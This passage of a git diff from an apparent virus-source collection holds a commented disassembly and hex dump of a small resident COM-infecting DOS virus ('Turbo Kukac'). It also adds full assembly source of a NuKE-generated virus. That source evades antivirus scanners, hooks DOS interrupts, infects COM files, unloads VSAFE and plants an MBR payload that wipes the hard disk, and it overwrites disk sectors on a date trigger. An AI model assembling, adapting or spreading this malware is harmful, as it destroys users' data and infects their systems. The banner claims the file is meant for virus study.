+28F8:0146 8CC8 MOV AX,CS +28F8:0148 8ED8 MOV DS,AX ;DS=CS +28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej- + ;nek a paragrafuscme +28F8:014D 2D0008 SUB AX,0800 +28F8:0150 8EC0 MOV ES,AX ;virus j szegmense +28F8:0152 BF0001 MOV DI,0100 +28F8:0155 83EE03 SUB SI,+03 +28F8:0158 B90002 MOV CX,0200 ;virus hossza +28F8:015B F3 REPZ +28F8:015C A4 MOVSB ;virus msolsa az j + ;szegmensbe +28F8:015D 8C06C702 MOV [02C7],ES ;j szegmens trolsa +28F8:0161 B96C01 MOV CX,016C ;belpsi pont +28F8:0164 890EC502 MOV [02C5],CX ;trolsa +28F8:0168 FF2EC502 JMP FAR [02C5] ;ugrs az j szegmens + ;01c6 offset-re + ;UJ SZEGMENSBEN A BELPSI PONT +28F8:016C 8CC1 MOV CX,ES +28F8:016E 8CD8 MOV AX,DS ;ahonnan msolta magt +28F8:0170 26 ES: +28F8:0171 A3CB02 MOV [02CB],AX ;RGI PRG. segment cm +28F8:0174 B80001 MOV AX,0100 +28F8:0177 26 ES: +28F8:0178 A3C902 MOV [02C9],AX ;0100h offset trolsa +28F8:017B 8CC0 MOV AX,ES +28F8:017D 8ED8 MOV DS,AX +28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY j + ;offset-je +28F8:0182 B005 MOV AL,05 +28F8:0184 B425 MOV AH,25 +28F8:0186 CD21 INT 21 ;INT 05 ellopsa +28F8:0188 B435 MOV AH,35 +28F8:018A B021 MOV AL,21 +28F8:018C CD21 INT 21 ;INT 21h cm lekrdez- + ;se +28F8:018E 2E CS: +28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (rgi) +28F8:0193 8CC3 MOV BX,ES +28F8:0195 2E CS: +28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (rgi) +28F8:019A B8D901 MOV AX,01D9 ;j INT 21h offset cm +28F8:019D 8BD0 MOV DX,AX +28F8:019F 8BC1 MOV AX,CX +28F8:01A1 8ED8 MOV DS,AX +28F8:01A3 B021 MOV AL,21 +28F8:01A5 B425 MOV AH,25 +28F8:01A7 CD21 INT 21 ;INT 21h ellopsa +28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ +28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!! +28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!! +28F8:01B4 8ED8 MOV DS,AX +28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP kdja +28F8:01BA 890E0201 MOV [0102],CX ;s operandusa +28F8:01BE 8EC0 MOV ES,AX +28F8:01C0 59 POP CX +28F8:01C1 58 POP AX +28F8:01C2 2E CS: +28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA- + ;TSA! + ;j INT 05 - HARD COPY rutin +28F8:01C7 90 NOP +28F8:01C8 50 PUSH AX +28F8:01C9 1E PUSH DS +28F8:01CA 52 PUSH DX +28F8:01CB 8CC8 MOV AX,CS +28F8:01CD 8ED8 MOV DS,AX + ;VGTELEN CIKLUS! +28F8:01CF BACE02 MOV DX,02CE ;szveg kezdete + ;Turbo Kukac v9.9 +28F8:01D2 B409 MOV AH,09 ;print string +28F8:01D4 E8D900 CALL 02B0 ;rgi INT 21h hivsa +28F8:01D7 EBF6 JMP 01CF ;jra! + + ;j INT 21h rutin +28F8:01D9 90 NOP +28F8:01DA 80FC3D CMP AH,3D ;file nyitsa alfunkci? +28F8:01DD 7403 JZ 01E2 ;igen +28F8:01DF E9C700 JMP 02A9 ;nem ugrsa az eredeti + ;INT 21h-ra +28F8:01E2 90 NOP +28F8:01E3 1E PUSH DS +28F8:01E4 06 PUSH ES +28F8:01E5 50 PUSH AX +28F8:01E6 53 PUSH BX +28F8:01E7 51 PUSH CX +28F8:01E8 52 PUSH DX +28F8:01E9 57 PUSH DI +28F8:01EA 56 PUSH SI + + ;File kiterjeszts ellenrzse + +28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete +28F8:01ED 8CDE MOV SI,DS +28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH + ;tvtele!) +28F8:01F1 B000 MOV AL,00 ;PATH lezr nulla +28F8:01F3 B93200 MOV CX,0032 ;file secifikci hossza +28F8:01F6 FC CLD ;elre +28F8:01F7 F2 REPNZ +28F8:01F8 AE SCASB ;PATH lezr 0 byte ke- + ;resse +28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszts + ;kezdet+1 pozicira mu- + ;tat +28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be +28F8:01FF 26 ES: +28F8:0200 3B05 CMP AX,[DI] ; 'OM' a vge ? +28F8:0202 7403 JZ 0207 ;igen valszinleg COM + ;file +28F8:0204 E99A00 JMP 02A1 ;nem COM ugrs az erede- + ;ti INT 21h-ra +28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be +28F8:020A 26 ES: +28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ? +28F8:020E 7403 JZ 0213 ;biztos hogy COM file! +28F8:0210 E98E00 JMP 02A1 ;nem COM ugrs az erede- + ;ti INT 21h-ra + ;File nyitsa + +28F8:0213 B43D MOV AH,3D ;file nyits +28F8:0215 B002 MOV AL,02 ;rs/olvass +28F8:0217 E89600 CALL 02B0 ;INT 21h hivsa +28F8:021A 7303 JNB 021F ;ha nincs hiba +28F8:021C E98200 JMP 02A1 ;hiba esetn ugrs az + ;eredeti INT 21h-ra +28F8:021F 8BD8 MOV BX,AX ;file kezel + + ;File mret ellenrzs + +28F8:0221 B90000 MOV CX,0000 +28F8:0224 BA0000 MOV DX,0000 +28F8:0227 B002 MOV AL,02 ;file vgre +28F8:0229 B442 MOV AH,42 ;file pointer mozgatsa +28F8:022B E88200 CALL 02B0 ;INT 21h hivsa +28F8:022E 3D00FE CMP AX,FE00 +28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file + ;65024 byte-nl +28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza + + ;Fertzend file eredeti 4 byte jnak + ;beolvassa + +28F8:0236 2E CS: +28F8:0237 A3BE02 MOV [02BE],AX ;letrolja +28F8:023A B442 MOV AH,42 ;file pointer mozgatsa +28F8:023C B000 MOV AL,00 ;file elejre +28F8:023E B90000 MOV CX,0000 +28F8:0241 BA0000 MOV DX,0000 +28F8:0244 E86900 CALL 02B0 ;INT 21h hivsa +28F8:0247 B43F MOV AH,3F ;olvass file-bl +28F8:0249 B90400 MOV CX,0004 ;4 byte +28F8:024C BAC102 MOV DX,02C1 ;ide tegye +28F8:024F 8CCF MOV DI,CS +28F8:0251 8EDF MOV DS,DI ;DS=CS +28F8:0253 E85A00 CALL 02B0 ;INT 21h hivsa +28F8:0256 B005 MOV AL,05 +28F8:0258 3A06C402 CMP AL,[02C4] ;utols byte=5 ? +28F8:025C 7443 JZ 02A1 ;igen, ugrs az eredeti + ;INT 21h -ra + + ;Fertzend file-ba a virusra + ;mutat JMP+op. kirsa (4 byte) + +28F8:025E B442 MOV AH,42 ;file pointer mozgatsa +28F8:0260 B000 MOV AL,00 ;file elejre +28F8:0262 B90000 MOV CX,0000 +28F8:0265 8BD1 MOV DX,CX +28F8:0267 E84600 CALL 02B0 ;INT 21h hivsa +28F8:026A B0E9 MOV AL,E9 ;JMP kdja +28F8:026C 2E CS: +28F8:026D A2BD02 MOV [02BD],AL ;letrolja +28F8:0270 B005 MOV AL,05 +28F8:0272 2E CS: +28F8:0273 A2C002 MOV [02C0],AL +28F8:0276 B90400 MOV CX,0004 ;4 byte +28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete +28F8:027C 8CC8 MOV AX,CS +28F8:027E 8ED8 MOV DS,AX +28F8:0280 B440 MOV AH,40 ;kirs file-ba +28F8:0282 E82B00 CALL 02B0 ;INT 21h hivsa + + ;Program megfertzse 0200h byte kirsa + ;azaz a virus mgmsolsa + +28F8:0285 B442 MOV AH,42 ;file pointer mozgatsa +28F8:0287 B002 MOV AL,02 ;file vgre +28F8:0289 B90000 MOV CX,0000 +28F8:028C 8BD1 MOV DX,CX +28F8:028E E81F00 CALL 02B0 ;INT 21h hivsa +28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-tl +28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza +28F8:0297 B440 MOV AH,40 ;kirs file-ba +28F8:0299 E81400 CALL 02B0 ;INT 21h hivsa +28F8:029C B43E MOV AH,3E ;file zrsa +28F8:029E E80F00 CALL 02B0 ;INT 21h hivsa +28F8:02A1 5E POP SI +28F8:02A2 5F POP DI +28F8:02A3 5A POP DX +28F8:02A4 59 POP CX +28F8:02A5 5B POP BX +28F8:02A6 58 POP AX +28F8:02A7 07 POP ES +28F8:02A8 1F POP DS + +28F8:02A9 90 NOP +28F8:02AA 2E CS: +28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra +28F8:02AF CF IRET + ;Eredeti INT 21h hivsa +28F8:02B0 9C PUSHF ;elmenti mivel az IRET + ;visszamenti a flag-eket +28F8:02B1 2E CS: +28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hivsa +28F8:02B6 C3 RET + +28F8:02B7 16 PUSH SS +28F8:02B8 130C ADC CX,[SI] +28F8:02BA 0202 ADD AL,[BP+SI] +28F8:02BC 00E9 ADD CL,CH +28F8:02BE 06 PUSH ES +28F8:02BF 06 PUSH ES +28F8:02C0 05E906 ADD AX,06E9 +28F8:02C3 0405 ADD AL,05 +28F8:02C5 0100 ADD [BX+SI],AX +28F8:02C7 0000 ADD [BX+SI],AL +28F8:02C9 0001 ADD [BX+DI],AL +28F8:02CB F0 LOCK +28F8:02CC 0901 OR [BX+DI],AX +28F8:02CE 54 PUSH SP +28F8:02CF 7572 JNZ 0343 +28F8:02D1 62 DB 62 +28F8:02D2 6F DB 6F +28F8:02D3 204B75 AND [BP+DI+75],CL +28F8:02D6 6B DB 6B +28F8:02D7 61 DB 61 +28F8:02D8 63 DB 63 +28F8:02D9 2039 AND [BX+DI],BH +28F8:02DB 2E CS: +28F8:02DC 3920 CMP [BX+SI],SP +28F8:02DE 2020 AND [BX+SI],AH +28F8:02E0 2020 AND [BX+SI],AH +28F8:02E2 2024 AND [SI],AH +28F8:02E4 0000 ADD [BX+SI],AL + +28F8:02FC 0000 ADD [BX+SI],AL +28F8:02FE FA CLI +28F8:02FF 00C7 ADD BH,AL + +Megjegyzs: + + Nagyon primitv virus, de megvan a maga zsenialitsa, kt legyet + t egy csapsra, pl COPY parancs esetn megnyit egy com file-t,s + ha a virus a memriban van, akkor mg a msoland file-t megfer- + tzi, s a COPY mr a fertztt file-t msolja! Nem igazn kr- + tkony vrus, pusztn mindentt ott akar lenni, s nehezteni a + felhasznl(k) munkjt! Mrete nagyon kicsi, mindssze 512 byte! + Hinyoznak a vrusbl az (tapasztalataim szerint) eddigi virusok- + ban fellelhet ellenrzsek, gondolok itt arra, hogy ha megtrtnik + egy file-ba (hoz) val kirs nem ellenrzi a program hogy valban + kirta-e azt az X byte-ot. Tovbb mikor rezidess (nem {hivatalo- + san} bejegyzetten) teszi magt nem mdostja az MCB. 13. byte-jn + lv RAM tetejnek a paragrafus cmtt a sajt maga lltal lefog- + lalt mrettel (kivons!), mint PL. a Yankee Doodle! A Yankee mg + azt is megnzi, hogy amit meg akar fertzni az az utols mem. + blokkban van-e, br abban kell lennie, mert a DOS egy programnak + odaadja a teljes szabad memrit, ami van... + + +DUMP: + +28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..= +28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............ +28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............ +28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H..... +28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-.. +28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................ +28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l............. +28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........ +28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!.. +28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................ +28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!....... +28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................ +28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R..... +28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t.. +28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV..... +28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM& +28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t. +28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s..... +28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=. +28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B.... +28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?....... +28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B +28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F....... +28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................ +28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B......... +28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>.. +28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X......... +28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................ +28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 .............. + + ;Kirand szveg kezdete +28F8:02C0 54 75 Tu +28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9 +28F8:02E0 20 20 20 24 $ + +28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............ +28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................ +28F8:0300 C7 . + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.turtle.asm b/MSDOS/Virus.MSDOS.Unknown.turtle.asm new file mode 100644 index 00000000..a45cc0c8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.turtle.asm @@ -0,0 +1,590 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call MBR +call TRASH_RN +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; + +mov ax,351ch ; +int 21h ;store the int 1ch vectors +mov word ptr [trampaint+bp],bx ;in cs:trampaint +mov word ptr [trampaint+2+bp],es ; +mov ax,251ch ;put the int 1ch (clock) vector +push cs ; +pop ds ; +mov dx,offset tardar ;in offset tardar +int 21h ; +mov dx,offset fin ; +int 27h ;main resident the code +NO_DAY: ; +ret ;ret for program +tardar: ;int 1c handler +pushf ; +pusha ; +mov cx,0ffffh ;fuck loop for slow speed +trampa: ; +mov ax,ax ; +loop trampa ; +popa ; +popf ; +JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch +ret ; +trampaint dd ? ; +;--------------------------------; + +MBR: +;************************************** +; Start of MBR-BOMB writing +;************************************** +mov ax,9f80h ;very high memory +mov es,ax ;good for buffer +mov ax,0201h ;read the original +mov cx,0001h ;MBR of the disk +mov dx,0080h ; +xor bx,bx ;to buffer 9f80:0000h +int 13h ; +push cs ; +pop ds ; +mov ax,9f80h ;add my MBR-BOMB +mov es,ax ;to real MBR in my +mov si,offset fat ;buffer +xor di,di ; +mov cx,105 ;ds:[fat]=>9f80:0000h +repe movsb ;total 105bytes +mov ax,9f80h ; +mov es,ax ; +xor bx,bx ;replace the original +mov ax,0301h ;MBR in the disk by the +xor ch,ch ;new MBR-BOMB. +mov dx,0080h ; +mov cl,1 ;WARNING! VSAFE/MSAVE +mov bx,0 ;NOTIFY THIS ACTION +int 13h ; +ret ; +;--------------------------------------------------- +;********************* +; Start of MBR code +;********************* +fat: ; +cli ;# +xor ax,ax ;# +mov ss,ax ;# +mov sp,7C00h ;# +mov si,sp ;# +push ax ;# +pop es ;# +push ax ;# +pop ds ;# +sti ;# + ;# +pushf ;# +push ax ;# +push cx ;# = This code be in the +push dx ;# original MBR +push ds ;# (NOT MODIFY) +push es ;# +MOV AH,04H ; Read real tyme +INT 1AH ; Clock +CMP DH,cs:byte ptr action_mes ; is Month? +JE CAGO ; yes! SNIF SNIF HD. +lit: +pop es +pop ds +pop dx +pop cx +pop ax +popf +jmp booti +CAGO: +;++++++++++++++++++++++++++++++++++++++++++++++++++++ +; START OF YOUR DESTRUCTIVE CODE (or not destructive) +;++++++++++++++++++++++++++++++++++++++++++++++++++++ + +rip_hd: + ;@ + xor dx, dx ;@ +rip_hd1: ;@ + mov cx, 2 ;@ + mov ax, 311h ;@ + mov dl, 80h ;@ + mov bx, 5000h ;@ + mov es, bx ;@ + int 13h ;@ + jae rip_hd2 ;@ + xor ah, ah ;@ + int 13h ;@ + rip_hd2: ;@ + inc dh ;@ + cmp dh, 4 ;@ + jb rip_hd1 ;@ + inc ch ;@ + jmp rip_hd + +;+++++++++++++++++++++++++++++++++++++++++++ +; END OF YOUR DESTRUCUTIVE CODE +;+++++++++++++++++++++++++++++++++++++++++++ +booti: +xor ax,ax ;# +mov es,ax ;# +mov bx,7c00h ;# +mov ah,02 ;# +mov al,1 ;# +mov cl,1 ;# #= This code be +mov ch,0 ;# in the original +mov dh,1 ;# MBR +mov dl,80h ;# (NOT MODIFY) + ;# +int 13h ;# + ;# +db 0eah,00,7ch,00,00 ;# +;******************* +; END OF MBR CODE +;******************* + +;--------------------------------- +TRASH_RN: ; +MOV AH,2DH ; +INT 21H ;get date +CMP Dl,6 ;is =6 (RAN 0-99) +jne NO_DAYY ;nop! fuck ret +mov ah,0dh ; +int 21h ;reset disk +mov al,2 ; +mov cx,0ffffh ; +mov dx,0 ; +int 26h ;fuck ffffh sector +mov ah,0dh ;reste disk +int 21h ; +mov al,2 ; +mov cx,0ffffh ; +mov dx,0ffffh ;new fuck+ +int 26h ;heheheh!!! +NO_DAYY: ; +ret ; +;--------------------------------- +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx 